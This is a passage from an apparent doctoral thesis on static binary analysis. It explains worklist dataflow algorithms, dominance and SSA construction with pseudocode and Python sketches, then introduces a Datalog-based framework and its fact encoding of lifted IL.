A classic worklist implementation is shown in Figure 2.9. All basic blocks are initialized with the empty set. On lines 6 and 7 we apply our equations. Line 8 checks if any change occurred to the OUT set of the current vertex v which is processed in the loop. If there is a change, it has an effect on all its successors, since the IN set is now changed for the successors of v. Consequently, we have to process the successors again. This is handled on lines 9-12.

1  OUT[BB] = ∅, ∀BB ∈ V
2  worklist ← V
3  while (worklist ≠ ∅) {
4      v = pop(worklist)
5      old = OUT[v]
6      IN[v] = ∪p∈pred(v) OUT[p]
7      OUT[v] = fv(IN[v])
8      if (old ≠ OUT[v]) {
9          ∀s = succ(v):
10             if (s ∉ worklist) {
11                 add s to worklist
12             }
13     }
14 }

Figure 2.9: Simple Worklist Algorithm.
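The worklist schema of Figure 2.9 translates almost one-to-one into Python. The sketch below runs a reaching-definition analysis over a small diamond-shaped CFG; the graph and the gen/kill sets are made up for illustration:

```python
def reaching_definitions(nodes, preds, succs, gen, kill):
    """Worklist evaluation of OUT[BB] = gen_BB ∪ (IN[BB] - kill_BB)."""
    OUT = {n: set() for n in nodes}
    worklist = list(nodes)
    while worklist:
        v = worklist.pop()
        IN = set().union(*(OUT[p] for p in preds[v]))  # meet over predecessors
        new_out = gen[v] | (IN - kill[v])              # transfer function f_BB
        if new_out != OUT[v]:
            OUT[v] = new_out
            for s in succs[v]:                         # successors must be revisited
                if s not in worklist:
                    worklist.append(s)
    return OUT

# diamond CFG: e -> a, e -> b, a -> c, b -> c; definitions as (variable, address)
preds = {"e": [], "a": ["e"], "b": ["e"], "c": ["a", "b"]}
succs = {"e": ["a", "b"], "a": ["c"], "b": ["c"], "c": []}
gen  = {"e": {("x", 1)}, "a": {("x", 2)}, "b": {("y", 3)}, "c": set()}
kill = {"e": {("x", 2)}, "a": {("x", 1)}, "b": set(),      "c": set()}

OUT = reaching_definitions(["e", "a", "b", "c"], preds, succs, gen, kill)
```

At the join node c, both the redefinition of x from a and the definition of x surviving through b reach the entry, which is exactly the situation the φ-functions of Section 2.3.2 resolve.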

The algorithm runs until a fixpoint is reached, i.e., no new changes are made to the OUT sets. In theory, the fixpoint is guaranteed if the transfer function and a so-called semilattice fulfill certain conditions. We refer the interested reader to [6] for more details on the theory. The reaching definition analysis is usually used to build a data dependency graph (DDG). Combined with a control dependence graph (CDG), a program dependence graph (PDG) is formed. The PDG has its classic use case in program slicing [101] or chopping [108]. In a modern approach, the PDG is combined with the AST and CFG to produce a code-property-graph (CPG) [213]. In a similar fashion as proposed by Reps et al. [168], who formulate program flaws as a graph reachability problem, Yamaguchi et al. model vulnerabilities as graph traversals through the CPG.

With reaching definitions we can also build so-called use-def-/def-use-chains. A use-def-chain (UD-chain) of a variable is basically a data structure that incorporates all definitions of that variable that reach a single use of that variable without any intervening definitions in between. Similarly, a def-use-chain (DU-chain) incorporates all uses of a variable that are reached by a single definition. These chains are invaluable for us, and as we see throughout this chapter, they can be used as building blocks to formulate taint analysis, points-to analysis, program slicing, and even constant value propagation. Since we use these chains extensively, we need an efficient way to compute them. Ideally, we transform our program into a representative format which makes the computation easy. Fortunately, with static single assignment (SSA) we have such a format.
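Inside a single basic block, both chain types fall out of one linear pass once the definitions reaching the block entry are known. A hypothetical sketch (the statement tuples and helper names are our own, not the framework's API):

```python
def build_chains(stmts, incoming=()):
    """UD-/DU-chains for one block. stmts are (addr, defs, uses) tuples;
    'incoming' holds (variable, def_addr) pairs reaching the block entry."""
    live = {}                            # var -> set of def addresses reaching here
    for var, addr in incoming:
        live.setdefault(var, set()).add(addr)
    ud, du = {}, {}
    for addr, defs, uses in stmts:
        for var in uses:                 # each use links to its reaching defs ...
            for d in live.get(var, set()):
                ud.setdefault((addr, var), set()).add(d)
                du.setdefault((d, var), set()).add(addr)
        for var in defs:
            live[var] = {addr}           # ... and a new definition kills older ones
    return ud, du

stmts = [
    (1, {"x"}, set()),          # x defined at address 1
    (2, {"y"}, {"x"}),          # y := f(x)
    (3, {"x"}, {"x", "y"}),     # x := g(x, y)  -- kills the definition at 1
    (4, set(), {"x"}),          # use of x
]
ud, du = build_chains(stmts)
```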

2.3.2 Static Single Assignment

Static single assignment (SSA) is a program transformation where each variable is defined exactly once. SSA is a standard utilized by optimizing compilers as it eases their procedures immensely, and we refer the reader to common literature for more details about the optimization steps. In this section we set the stage for the frontend of our binary analysis framework and show how we benefit from SSA and the design of the algorithm we present. One of the invaluable benefits we have is that once the program is transformed, definition-use relations become explicit. Each use is dominated by its definition. All we need is a lookup. The algorithm needs some preliminary theory on some fundamental techniques in program analysis which we present in the following.

Definition 1. Let G = (V, E) be a CFG with entry node e. Consider two vertices a and b in V. If every path from e to b passes a, then a dominates b, written a ⪰ b. The set of vertices dominated by a, {v | a ⪰ v} ∪ {a}, is denoted as Dom(a). Each node dominates itself. If a ⪰ b and a ≠ b, then a strictly dominates b, which is denoted by a ≫ b.

Definition 2. Consider two vertices a and b with a ≫ b. Vertex a immediately dominates b iff any node z ≠ a that strictly dominates b also strictly dominates a. We say that idom(a, b) ⇐⇒ a ≫ b ∧ ∀z ≠ a : z ≫ b =⇒ z ≫ a.

By treating each idom(a, b) as an edge from node a to b, the immediate dominance relation gives us a hierarchical tree structure also known as the dominator-tree (Dom-Tree). We have seen how to formulate data flows in terms of transfer

functions. A dominance relation can be formulated in a similar fashion as we did in the previous section:

fBB(x) = x ∪ {BB} (2.4)

OUT [BB] = fBB(IN[BB]) (2.5)

IN[BB] = ∩p∈pred(BB)OUT [p] (2.6)

As equation 2.6 suggests, we have a forward flow, i.e., values are propagated from predecessors to successors. We can use the same worklist arrangement as presented in Figure 2.9 to compute the dominance relation. However, some minor changes are needed to make that algorithm work for us. First, we initialize each OUT[BB] with V (all nodes in the CFG), i.e., we substitute line 1. Note that the OUT[BB] set gives us the set of all basic blocks that dominate BB. This, in particular, means that OUT[e] = {e} where e is the entry node of the CFG. We incorporate equations 2.4 – 2.6 into the algorithm of Figure 2.9 by substituting lines 6 and 7 with the equations. The algorithm has a worst case complexity of O(N²). In practice, however, it turns out to perform well for CFGs. A more sophisticated algorithm with near-linear complexity is given by the Lengauer-Tarjan algorithm [125]. This algorithm, however, plays out its strengths on very large graphs. With the following definition of dominance frontiers, we have the last building block to present the SSA algorithm.
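Equations 2.4–2.6 plugged into the worklist schema yield a compact dominance computation. A round-robin Python sketch over an if-else diamond (the graph is made up for illustration):

```python
def dominators(nodes, preds, entry):
    """Dataflow formulation: OUT[B] = {B} ∪ (∩_{p ∈ pred(B)} OUT[p]).
    OUT[B] is the set of all basic blocks dominating B."""
    all_nodes = set(nodes)
    OUT = {n: set(all_nodes) for n in nodes}   # initialize with V (line 1 substituted)
    OUT[entry] = {entry}
    changed = True
    while changed:
        changed = False
        for v in nodes:
            if v == entry:
                continue
            IN = set(all_nodes)
            for p in preds[v]:                 # meet is intersection here
                IN &= OUT[p]
            new_out = IN | {v}
            if new_out != OUT[v]:
                OUT[v] = new_out
                changed = True
    return OUT

# diamond CFG: e -> a, e -> b, a -> c, b -> c
preds = {"e": [], "a": ["e"], "b": ["e"], "c": ["a", "b"]}
OUT = dominators(["e", "a", "b", "c"], preds, "e")
```

Neither branch node dominates the join node c; only the entry e does, which is the situation that creates a dominance frontier.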

Definition 3. Let Dom(a) = {v | a ⪰ v} be the set of all vertices dominated by a. Let succ(v) be the set of successors of v. Then the set {s ∈ succ(v) | v ∈ Dom(a) ∧ s ∉ Dom(a)} is called the dominance frontier of node a.
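Definition 3 reads off directly as a set comprehension. A sketch over the same kind of if-else diamond, with the dominance sets assumed to be precomputed:

```python
def dominance_frontier(a, dom, succs):
    """DF(a): successors s of nodes v dominated by a, where s itself
    escapes the dominance of a (Definition 3)."""
    return {s for v in dom[a] for s in succs[v] if s not in dom[a]}

# diamond CFG: e -> a, e -> b, a -> c, b -> c
succs = {"e": ["a", "b"], "a": ["c"], "b": ["c"], "c": []}
# dom[n] = Dom(n), the set of nodes n dominates (including itself)
dom = {"e": {"e", "a", "b", "c"}, "a": {"a"}, "b": {"b"}, "c": {"c"}}
```

The join node c lies in the frontier of both branch nodes, while the entry e, which dominates everything, has an empty frontier.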

The intuition behind SSA is to give each assignment to a variable a new subscripted name. For instance, a subscripted name for a register r1 can be r1_1. All uses of r1 that are reached by an assignment have to be renamed as such. At join nodes, i.e., at nodes with in-degree ≥ 2, a so-called φ-function is inserted. As we usually have branches in programs and definitions might reach a join node from different branches, a mechanism is needed to model the selection of one of the definitions. Here the φ-function comes into play. This is best illustrated by the following example:

...
a: rax_7  ← rax_6 + rbx_8
b: rax_9  ← rcx_6

c: rax_10 ← φ(rax_7, rax_9)
...

The definitions of registers rax_7 and rax_9 reach the join point at c. The φ-function indicates which definitions reach the join point. Subsequent uses of the rax register are now uses of rax_10.

φ-function placements

The question now arises how to place the φ-functions efficiently. We could group each assignment pair of the same variable and see if their definitions reach the same join point, place a φ-function there, add it to the group, since we have a new assignment, and start again. In this manner we can iteratively determine the join nodes with respect to each assignment. A trick proposed by Cytron et al. [63] to do this efficiently is the usage of dominance-frontiers. To make this clear, let's suppose that we have the definition of some register r in node X. Each node that is dominated by X sees this definition. Eventually, we reach a node Z not dominated by X, which means that there is another path to Z that bypasses X. Obviously, node Z is a join node and in need of a φ-function for r. If node Z is the first node on the path from X that is not dominated by X, then Z is in the dominance-frontier of X. We can place a φ-function at Z and continue searching for nodes in the dominance-frontier of node Z. Cytron et al. [63] prove that this iterative procedure gives us the desired join nodes for the placement of φ-functions. For the sake of clarity, the algorithm for the placement of φ-functions is given in Figure 2.10. It is a variation of the original algorithm given by Cytron et al. [63], adapted for our binary purposes. The algorithm first initializes the set of all IL-expressions, which we denote as Pool, by calling GetAllExpressions. This function basically runs over all basic blocks of the CFG and gives us all IL-expressions that are defined. The algorithm then runs over all expressions starting at line 4. The HasAlready set is used to keep track of nodes that have a φ-function already placed with respect to the currently processed expression. At line 7 the

1  Pool = GetAllExpressions()
2  worklist = ∅
3  PhiMap = ∅
4  ∀ expr ∈ Pool:
5      HasAlready = ∅
6      EverBeenOnTheWorklist = ∅
7      ∀n ∈ Assign(expr):
8          EverBeenOnTheWorklist = EverBeenOnTheWorklist ∪ {n}
9          worklist = worklist ∪ {n}
10     while (worklist ≠ ∅) {
11         current = pop(worklist)
12         ∀y ∈ DF(current):
13             if y ∉ HasAlready:
14                 predecessors = GetPreds(y)
15                 phi_expr = φ-function(expr, ..., expr)    /* length(predecessors) operands */
16                 PhiMap = PhiMap ∪ {(addr_of(y), phi_expr)}
17                 HasAlready = HasAlready ∪ {y}
18
19                 if y ∉ EverBeenOnTheWorklist:
20                     EverBeenOnTheWorklist =
21                         EverBeenOnTheWorklist ∪ {y}
22                     worklist = worklist ∪ {y}
23 }

Figure 2.10: Placement of φ-functions [63].

Assign function gives us all the nodes that define expr. These nodes are put into the worklist and into EverBeenOnTheWorklist. The reason for the latter set is that the worklist shrinks with each iteration and has no memory of nodes it has already processed: due to line 12, a node in the dominance frontier of the current node might also be an assigning node that has already been placed on the worklist. Note that with the placement of the φ-function we introduce a new assigning node which needs to be put on the worklist if not already done. This is checked on line 19. On line 16, we add the φ-expression to the PhiMap. In the algorithm it is sketched as a set of tuples, but we implemented it as a hashmap over the address of basic blocks to a list of φ-expressions that are added to the block. Each φ-expression is implemented as a data structure that links the expression to its statement. This way we can directly access the φ-function. Note that we differ here in our definition of φ-functions as opposed to the definition in common literature. When we speak about φ-functions, we refer to the right-hand side of a φ-statement. With the left-hand side of the statement we refer to a φ-expression.
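The core iteration of Figure 2.10 for a single expression condenses to a few lines of Python. In the sketch, DF is the precomputed dominance-frontier map and the diamond-shaped example CFG is made up for illustration:

```python
def place_phis(assign_nodes, DF):
    """Iterated dominance frontier of the assigning nodes: exactly the
    join nodes that need a phi-function for this expression."""
    has_already = set()
    ever_on_worklist = set(assign_nodes)
    worklist = list(assign_nodes)
    phi_nodes = set()
    while worklist:
        current = worklist.pop()
        for y in DF[current]:
            if y not in has_already:
                phi_nodes.add(y)
                has_already.add(y)
                # the phi itself is a new assignment of the expression,
                # so y may spawn further frontier nodes
                if y not in ever_on_worklist:
                    ever_on_worklist.add(y)
                    worklist.append(y)
    return phi_nodes

# diamond CFG with definitions of the same register in nodes a and b,
# joining in node c; DF precomputed as in Definition 3
DF = {"e": set(), "a": {"c"}, "b": {"c"}, "c": set()}
joins = place_phis({"a", "b"}, DF)
```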

Renaming

With the placement of the φ-functions, or more precisely, the φ-statements, we now come to the most critical part, which is the renaming procedure. The design of the algorithm gives us invaluable information during the renaming process which we exploit for our analyses. The algorithm is given in Figure 2.11. We use the following data structures and functions:

• Counter: is a HashMap that maps a register expression to a counter; used for subscripting the symbols.

• Stack: is a HashMap that maps a register expression to a stack of renamed expressions; the top of the stack is the live register definition.

• Lhs/Rhs: functions which map an IL-statement to its left-hand side or right-hand side expressions, respectively.

• Register: is a function that returns a set of registers that are part of an IL-expression.

• Lift: returns an abstract environment of the given instruction.

• PhiMap: is a HashMap that maps each basic block to a set of φ-expressions placed in that block.

• WhichPred: is a function that maps (X, Y) ↦ n ∈ {0, 1, . . . , k}, where Y is a predecessor of X, and k = length(predecessors(X)). Each predecessor of X is associated with a unique id. WhichPred gives us that id.

The following node shows a lifted x86-64 basic block in SymIL. Each line is a statement.

———————-0xd484———————-
rax_13 ← phi(rax_12, rax_24)
rdx_2  ← phi(rdx_1, rdx_5)
rsi_2  ← phi(rsi_1, rsi_7)
rdi_3  ← phi(rdi_2, rdi_8)
rsp_8  ← (rsp - 0x98)
rax_14 ← 0x0
next_7 ← 0xd489

For clarity, we apply our functions on the block. Let S1 be the first line, then Lhs(S1) = rax_13 and Rhs(S1) = phi(rax_12, rax_24), which represents the φ-function. PhiMap maps 0xd484 to the φ-statements at S1, . . . , S4. On S5 we have Rhs(S5) = (rsp − 0x98), which is an operation. Applying Register(Rhs(S5)) gives us rsp. The whole block is represented by an SSAMap.

Definition 4. Let BB be an arbitrary basic block and let Si be the i-th IL statement processed in BB. The index i is called the order of the IL statement within BB. SSAMap : (Expression × ℕ) → Expression is a function that maps each left-hand side expression of Si to its right-hand side expression: SSAMap(Lhs(Si), i) ↦ Rhs(Si).
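In our implementation the SSAMap of Definition 4 is essentially a dictionary keyed by the renamed left-hand side together with the order. A hypothetical rendering of the 0xd484 block from above (the variable and helper names are our own):

```python
# (lhs, order) -> rhs, as produced while renaming the 0xd484 block
ssamap_0xd484 = {
    ("rax_13", 0): "phi(rax_12, rax_24)",
    ("rdx_2",  1): "phi(rdx_1, rdx_5)",
    ("rsi_2",  2): "phi(rsi_1, rsi_7)",
    ("rdi_3",  3): "phi(rdi_2, rdi_8)",
    ("rsp_8",  4): "(rsp - 0x98)",
    ("rax_14", 5): "0x0",
    ("next_7", 6): "0xd489",
}

def rhs_of(ssamap, lhs, order):
    """Definition-use lookup: in SSA form, resolving a definition is a
    single dictionary access."""
    return ssamap[(lhs, order)]
```

The order disambiguates repeated statements within the block; combined with the block address it uniquely identifies each IL statement.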

Lines 1-3 set up the Stack and Counter data structures. They are implemented as HashMaps, and there is no need to iterate over all expressions and assign an empty list to them as we can do this on demand. We do so in the algorithm to clarify the type of the maps. Lines 11-20 specify the renaming procedure of each expression. The function Rename takes an IL-expression and a boolean value which indicates if it is a definition or a use. If it is a use, the top of the stack gives us the live definition of the registers that are used in the expression. Otherwise, we have a definition, in which case the current state of the counter with respect to the register is extracted from the map. We use the counter to give the register a subscript, i.e., a register r is renamed to register r_i where i is the current state of the counter. On line 19 the current state of the counter is updated by incrementing the counter with respect to the register. On line 22 the actual renaming procedure begins, by starting at the root node of the dominator tree and recursively traversing the tree in a depth-first search manner. Lines 26-29 handle the φ-functions. For each φ-statement in the current node, we rename the left-hand side of the statement and update the SSA environment (SSAMap). With each IL statement processed the order is increased. The order makes sure that the same IL statements map to distinct expressions within a block. Combined with the basic block address, the order gives us a unique identifier for each IL statement. This is necessary in a later stage to map IL statements to their assembly counterpart. The Lift function on line 32 needs special care. It is a feature of the Amoco framework and incorporates the functionality of an abstract environment that represents a set of symbolic or concrete states. Access to lifted statements is handled through the API interface of these abstract environments. Lifting here, in particular, means adding an instruction to an environment.
Each assembly instruction that gets lifted and added to the same environment is evaluated in the current context of the execution. While this feature might be useful for symbolic evaluation and execution, we only use the environments for a single purpose, which involves the lifting. In our case, lifting an instruction always creates an empty environment to which we add a single instruction and extract the lifted IL statements for the renaming process. Note that the expressions that are associated with the φ-function are not touched before lines 45-50. To clarify what these lines do, let's assume that the current state of the algorithm is reflected as follows for our x86-64 example:

...
a: rax_7 ← rax_6 + rbx_8
b: rax_9 ← rcx_6

c: rax ← φ(rax_6, rax)
...

The algorithm is currently processing node b, has already processed node a, and has not seen node c. What lines 45-50 do for node b is to replace the live definition of rax in the scope of node b with the corresponding operand of the φ-function. As a consequence, we get rax ← φ(rax_6, rax_9) at c. In its essence, the algorithm follows the original algorithm proposed by Cytron et al., but we adapted it to our IL and added so-called Collectors to it, which is inspired by the work of Van Emmerik [204]. We use the Collectors to gather valuable information during the run of the algorithm for later purposes. The Collectors are basically a snapshot of the Stack data structure we use to keep track of the currently-live definitions. Lines 55-58 make those snapshots at leaf-/calling-nodes. These snapshots are invaluable to map definitions back and forth between a caller and callee context.

1  ∀expr:
2      Stack[expr] = ∅
3      Counter[expr] = ∅
4
5  V = root(DomTree)
6  SSAMaps = ∅
7
8  CollectCalls_stack = ∅
9  CollectLeafs_stack = ∅
10
11 procedure Rename(expr, is_use):
12     reg_expr = Register(expr)
13     if is_use:
14         return Top(Stack[reg_expr])
15
16     /* handle definition */
17     i = Counter[reg_expr]
18     push reg_expr_i onto Stack[reg_expr]
19     Counter[reg_expr] += 1
20     return reg_expr_i
21
22 procedure Search(V):
23     SSAMap = ∅
24     OldDefs = ∅
25     order = 0
26     ∀ φ-statement ∈ PhiMap[V]:
27         phi_expr = Rename(Lhs(φ-statement), false)
28         SSAMap[(phi_expr, order)] = Rhs(φ-statement)
29         order += 1
30
31     ∀ Instr ∈ V:
32         Env = Lift(Instr)
33         ∀ statement ∈ Env:
34             DefExpr = Lhs(statement)
35             OldDefs = OldDefs ∪ {DefExpr}
36             UseExpr = Rhs(statement)
37             rUseExpr = Rename(UseExpr, true)
38             rDefExpr = Rename(DefExpr, false)
39
40             SSAMap[(rDefExpr, order)] = rUseExpr
41             order += 1
42
43     SSAMaps[V] = SSAMap
44
45     ∀s ∈ CFGSucc(V):
46         if s ∈ PhiMap:
47             ∀ φ-statement ∈ PhiMap[s]:
48                 j = WhichPred(s, V)
49                 φ-function = Rhs(φ-statement)
50                 replace j-th operand in φ-function with Rename(expr, true)
51
52     ∀s ∈ DomTreeSucc(V):
53         Search(s)
54
55     if V is a calling node:
56         CollectCalls_stack[V] = Copy(Stack)
57     if V is a leaf in the CFG:
58         CollectLeafs_stack[V] = Copy(Stack)
59
60     ∀expr ∈ OldDefs:
61         ∀reg ∈ Register(expr):
62             pop Stack[reg]

Figure 2.11: Renaming IL-Expressions.

3 Mentalese - A Binary Analysis Framework

Contents

3.1 From Datalog to Binary Analysis
    3.1.1 Datalog
    3.1.2 Knowledgebase: A Mental-IR
3.2 Overview
3.3 Frontend
    3.3.1 Stack Normalization
    3.3.2 SymIL Extensions
    3.3.3 Scopes
3.4 Backend
    3.4.1 Transition Descriptors
    3.4.2 Pointer Analysis
    3.4.3 Flow-Sensitivity
    3.4.4 Context-Sensitivity
3.5 Analysis Derivatives
    3.5.1 Taint-Analysis
    3.5.2 Value Propagation
    3.5.3 Slicing
3.6 Experimental Study: Pointer Analysis

In this chapter we present the design of our analysis framework and how it contributes to our community. A common pattern we constantly faced in recent years when working with analysis frameworks is the amount of time spent writing analysis procedures. Most of the time we find ourselves writing a static analysis component in the specific language of the framework by

taking into account the utilized data structures, variables, and the design of the algorithms. Furthermore, the worklist arrangements we have seen in the last chapter can reach cumbersome dimensions in the process of development. Basically, we lose precious time on establishing an assisting environment rather than concentrating on the problem itself. How can we implement a symbolic taint analyzer, slicer, or a points-to analysis without getting ourselves into those low-level details? What we want is a framework that allows us to define an analysis with little effort and knowledge about the underlying environment. Once we have the analysis procedures, another desired property is fusion, i.e., combining the analysis procedures for interoperability. Each analysis can complement the other with valuable insights and facts that are inferred during its procedure. For instance, we might combine a taint analysis with a points-to analysis to track aliased taint, i.e., aliased memory locations that propagate the same taint. We face such a need in Chapter 4. The question we ask here is: how can one analysis efficiently contribute to a set of insights which another analysis can transparently use as if the new insight was always there? A third property of interest concerns cross-architecture support. Ideally, an analysis can be applied to each architecture without changing any line of code in our analysis algorithms. However, in many cases, we face architecture-specific properties which demand adaption in the analysis procedure. Our property of interest here is to keep the core functionality of the analysis and add optional rules to it which complement the analysis and adapt to architecture-specific properties on demand. In the current landscape of binary analysis tools, interoperability with other tools that might complement functionality between frameworks is painful and mostly not given.
This also concerns the interoperability of the analyses of the same framework. The motivation of our work is not to just add a new framework to the line of existing work, but to present a design that allows us to build new analyses in a most natural and flexible manner with scalability and interoperability in mind, allowing researchers to build on it. In what follows we tackle the desired properties which we have outlined so far.

3.1 From Datalog to Binary Analysis

Datalog, in its essence, is a query language based on the logic paradigm, and it is specifically designed to interact with large databases. The demand for modern applications to process large amounts of data in parallel, and to reason about them in a high-level and abstract fashion, has given rise to Datalog-based systems and

different dialects [10, 206, 111, 212]. One of these dialects is QL, a commercialized Datalog system by Semmle [148] which is designed to do efficient code auditing and vulnerability research on source code. The use of Datalog allows us to express analyses in a highly declarative manner. It turns out that Datalog fulfills most of our requirements in a natural way. Its declarative nature allows us to focus on the "what" of our problems, discarding any low-level details of the algorithms. These are handled by the Datalog engine.

3.1.1 Datalog

In order to understand our approach, this section serves to give a brief primer on Datalog. Datalog is a subset of first-order logic and can basically be seen as a restricted Prolog without data structures¹. A logic program consists of a finite set of facts and rules. Facts describe certain assertions about a closed world, which, in our case, is a binary application. Facts and rules are represented as Horn clauses of the form:

P0 : − P1,...,Pn

where Pi is a literal of the form p(x1, . . . , xk) such that p is a predicate and the

xj are terms. Each term can be a variable or a constant. The left-hand side of

the clause is called the head (P0); the right-hand side is called the body. In first-order logic, a clause is a disjunction of literals. A Horn clause is a specific form of a clause with exactly one positive literal:

P0 ∨ ¬P1 ∨ ... ∨ ¬Pn

The clause can be written as

P0 ∨ ¬(P1 ∧ ... ∧ Pn) which is a logical implication:

(P1 ∧ ... ∧ Pn) −→ P0

The conventional way to write this in a logic program is

P0 ←− (P1 ∧ ... ∧ Pn)

where the left-arrow symbol is usually replaced by the :- symbol in Datalog programs. A clause is true when each literal in its body is true. A clause can also have an empty body, which makes it a fact. A classic example of a Datalog program is given as follows:

¹This depends on the Datalog dialect.

1 Edge(1,2), Edge(2,3), Edge(3,4), Edge(4,1), Edge(4,5).

2 Reach(a,b) :- Edge(a,b).

3 Reach(a,b) :- Reach(a,z), Edge(z,b).

This program computes the reachability between all nodes in the graph. Line 1 defines Edge facts that model a graph. Line 2 says that node a reaches b when there is an edge from a to b. Line 3 computes the transitive closure, i.e., when we reach z from a, and there is an edge from z to b, then a reaches b. Each comma in the body of a clause is a logical conjunction. Applied to the facts, Line 2 gives us a copy of all edges expressed in terms of Reach. This gives us a set of newly deduced facts: Reach(1,2), Reach(2,3), Reach(3,4), Reach(4,1), Reach(4,5).

In a new iteration the Datalog engine can now use Line 3 to deduce the transitive closure. For instance, we have Reach(2,3) and Edge(3,4), which gives us Reach(2,4) by applying Line 3. Lines 2 and 3 define what is called a Datalog rule. Each Datalog program has so-called safety conditions, i.e., each variable in the head of a rule must appear in the body of the same rule. This condition makes sure that if a rule is satisfied, the rule becomes ground. A fact, predicate/literal, rule, or clause is said to be ground if it does not contain any variables, that is, all variables are substituted by constants. For instance, Reach(2,3) and Reach(2,4) are ground instantiations of the rule. Conventional Datalog programs distinguish between intensional database (IDB) and extensional database (EDB) predicates. The EDB embodies a collection of a-priori facts, e.g., the edges in our example. These EDB predicates are also called input relations; they build up the base and are fed into Datalog before any analysis code runs. IDB predicates are those defined by rules; the facts they deduce follow from what is already known in the closed world. These deduced facts, in turn, build up the basis for new facts to be deduced. Datalog programs operate until they are saturated with facts, i.e., no new facts are found and a fixpoint is reached. To get a grasp of what this means, we briefly look at the notion of interpretation. Given a Datalog program, an interpretation I of the program assigns constant values to each literal. Such an assignment is also called a Herbrand interpretation. An interpretation is a subset of all possible assignments. For instance, { Reach(1,2), Reach(2,3), Reach(3,4), Reach(4,1), Reach(4,5), Reach(1,1), Reach(4,3) } is a possible interpretation. An interpretation I is said to satisfy a clause if every ground instantiation of the clause is satisfied by I. In such a case the interpretation is said to be a model of the clause.
To reach a fixpoint means that we have found a model that satisfies all clauses in the program.

There are many such models that can satisfy our clauses, but it can be shown that any Datalog program is guaranteed to have a fixpoint with a unique smallest model, which is also called the least Herbrand model in the literature. This model can be computed in time polynomial in the number of facts, i.e., the total number of facts that can be derived is polynomial. The fixpoint-based computation is known as bottom-up evaluation and is the preferred strategy for Datalog. In contrast to Prolog, which uses a top-down approach starting from the goal, we start from the base facts and work our way bottom-up until we reach the goal. Many program analyses are based on fixpoint algorithms which utilize worklist arrangements [6]. With Datalog, we avoid the design of these arrangements in a natural way. For a thorough introduction that covers more of the theoretical foundations, we refer the reader to [91, 37]. The Datalog engine of our choice is Soufflé [111].
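The bottom-up evaluation of the Edge/Reach program above can be sketched in a few lines of Python; this is a naive fixpoint loop for illustration only, not how Soufflé evaluates rules internally.

```python
# Naive bottom-up (fixpoint) evaluation of the Reach program.
edges = {(1, 2), (2, 3), (3, 4), (4, 1), (4, 5)}  # EDB facts

reach = set(edges)  # Rule in line 2: Reach(a,b) :- Edge(a,b).
while True:
    # Rule in line 3: Reach(a,b) :- Reach(a,z), Edge(z,b).
    derived = {(a, b) for (a, z) in reach for (z2, b) in edges if z == z2}
    if derived <= reach:  # no new facts -> fixpoint (saturation) reached
        break
    reach |= derived

# The cycle 1->2->3->4->1 lets every node among 1..4 reach every node
# among 1..4 (including itself) plus the sink node 5.
print(len(reach))  # 20 derived Reach facts
```

The loop terminates exactly because the least model is finite: once an iteration derives no fact outside `reach`, the model is saturated.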

3.1.2 Knowledgebase: A Mental-IR

To process a binary executable with Datalog, we need to transform it into an EDB, that is, we extract facts from the executable. Each fact is a row in a TSV (tab-separated values) file or a row in a database table. For instance, the edge facts that we saw in the previous section can have the following tab-separated encoding:

1	2
2	3
3	4
4	1
4	5
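Such a fact file is plain TSV, so producing one needs no special tooling; a minimal sketch (the in-memory buffer stands in for an Edge.facts file):

```python
import csv
import io

# The Edge facts from the previous section, one tab-separated row per fact.
edge_facts = [(1, 2), (2, 3), (3, 4), (4, 1), (4, 5)]

buf = io.StringIO()  # stands in for open("Edge.facts", "w")
writer = csv.writer(buf, delimiter="\t", lineterminator="\n")
writer.writerows(edge_facts)

tsv = buf.getvalue()
print(tsv)
```

Any extractor that emits one tab-separated row per fact can feed the Datalog engine, which is what makes the fact extraction easy to parallelize.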

In Soufflé we can declare an EDB fact by:

.decl Edge(a:number, b:number)
.input Edge

This tells the engine that Edge is an input relation or EDB predicate, and the engine will look for a tab-encoded Edge.facts file at a specified location. Each row in that file is then used to instantiate an Edge(a,b) fact. The facts of primary interest to us are the expressions of our IL (see Section 2.3). The following code shows a sequence of IL expressions in a basic block:

———————0x584e4———————-
r3_4 ← M32(r0)
M32(r0+4) ← r3_4
r3_5 ← 0
M32(r0) ← r3_5

We call this block an IL-Block. To further proceed with the extraction of facts into the EDB, we need to introduce the notion of an IL-Address.

Definition 5. An IL-Address is a tuple (bb, order) where bb is a basic block address and order an index i ∈ N, such that order is the ith IL-Instruction in the IL-Block.

In the block above, the IL-Address (0x584e4, 1) corresponds to:

M32(r0+4) ← r3_4

Many IL-Addresses can map to a single instruction address since a single instruction might need several IL-Instructions to model its semantics. The x86-64 push rbp instruction, for instance, is expressed as follows:

rsp_0 ← rsp - 0x8
(rsp_0) ← rbp

Both statements have different IL-Addresses but map to the same instruction address.
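This many-to-one relation between IL-Addresses and instruction addresses can be modelled as a plain mapping; the addresses below are hypothetical and only illustrate Definition 5:

```python
# IL-Address (bb, order) -> assembly address; hypothetical addresses.
# "push rbp" lifts to two IL statements, so two IL-Addresses share one
# assembly address (cf. the ILAddrToAddr facts in Table 3.1).
il_to_addr = {
    (0x1000, 0): 0x1000,  # rsp_0 <- rsp - 0x8
    (0x1000, 1): 0x1000,  # (rsp_0) <- rbp
    (0x1000, 2): 0x1001,  # next lifted instruction
}

def asm_address(bb, order):
    """Translate an IL-Address back to the original assembly address."""
    return il_to_addr[(bb, order)]

print(hex(asm_address(0x1000, 1)))
```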

Statement-wise, we iterate over the IL-Block, processing the left-hand side and right-hand side expressions of each statement. Each register on the left-hand side is flagged as a definition. This is also the case for registers used as the base address in a memory expression. We do this to better distinguish a register that is stored from the same register serving as the base pointer of the store location. For instance, we might have:

M32(r3_4+4) ← r3_4

We flag r3_4 as a definition on the left-hand side and as a use on the right-hand side. Applied to our example, each expression that models a register is encoded as follows:

13	r3_4	d	-1	361700	0	sub_57DB4
17	r0	u	-1	361700	0	sub_57DB4
19	r0	d	-1	361700	1	sub_57DB4
23	r3_4	u	-1	361700	1	sub_57DB4
29	r3_5	d	-1	361700	2	sub_57DB4
31	r0	d	-1	361700	3	sub_57DB4
37	r3_5	u	-1	361700	3	sub_57DB4

The signature of this EDB predicate is given as follows:

Register(reg_id, ssa_name, def_use, is_slice, bb, order, ctx)

Applied to the first row of our encodings, we get the instantiated fact:

Register(13, "r3_4", "d", -1, 361700, 0, "sub_57DB4")

The def_use term specifies whether the register is part of a definition, denoted by "d", or a use, denoted by "u". The first term is an ID which is not necessarily unique among all register entries but has to be unique per instruction. This allows us to parallelize the process of extracting facts from the binary. We use the ID to pinpoint each operand in an equation. For instance, we might extend the statement from above as follows:

M32(r3_4+4) ← r3_4 + r3_4

